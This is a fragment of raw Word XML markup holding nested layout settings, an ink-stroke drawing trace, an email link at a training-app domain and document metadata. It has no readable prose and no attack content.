      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="30037066">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="263656152">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="579171637">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="433139035">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                    <w:div w:id="5920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mailto:J12934@juice-sh.op"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2T04:21:10.511"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.035" units="cm"/>
      <inkml:brushProperty name="height" value="0.035" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">109 73 24575,'36'1'0,"0"-2"0,0-2 0,51-9 0,-40 4 0,1 3 0,-1 2 0,92 6 0,-32-1 0,30-4 0,149 5 0,-276-2 0,1 1 0,0 0 0,0 1 0,-1 0 0,1 1 0,-1 0 0,0 0 0,0 1 0,10 7 0,-15-8 0,1-1 0,-1 1 0,0 0 0,-1 1 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,-1-1 0,-1 1 0,1 0 0,-1 0 0,2 11 0,26 138 0,-18-99 0,-8-40 0,0 1 0,-1-1 0,-1 0 0,0 34 0,-2-46 0,-1 0 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1-1 0,0 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1-1 0,-5 2 0,-29 13 0,-1-2 0,-1-2 0,-55 11 0,65-17 0,-11 0 0,0-2 0,0-2 0,-1-2 0,-53-5 0,-6 1 0,75 2 0,1-1 0,-34-8 0,32 4 0,-47-2 0,32 3 0,-1-2 0,2-2 0,-1-2 0,2-1 0,-58-26 0,60 24 0,31 11 0,-1-1 0,0 0 0,1-1 0,0 1 0,0-1 0,0-1 0,0 1 0,1-1 0,0 0 0,1 0 0,-1-1 0,1 0 0,0 0 0,1 0 0,-1-1 0,1 1 0,1-1 0,0 0 0,0 0 0,0 0 0,-1-14 0,-2-14 0,1-1 0,3 1 0,2-66 0,1 57 0,-1 39-45,-1 0-1,1 0 1,0 0-1,1 0 1,0 0-1,0 0 1,0 1-1,0-1 1,1 0-1,0 1 1,0-1-1,1 1 1,-1 0-1,1-1 1,0 1-1,1 1 1,-1-1-1,1 0 1,0 1-1,0 0 1,0 0-1,1 0 1,0 0-1,-1 1 0,1-1 1,0 1-1,1 1 1,-1-1-1,9-2 1,3-2-6781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723</Words>
  <Characters>3980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Vargas Zúñiga</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Miguel Vargas Zúñiga</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-12T03:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-12T04:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>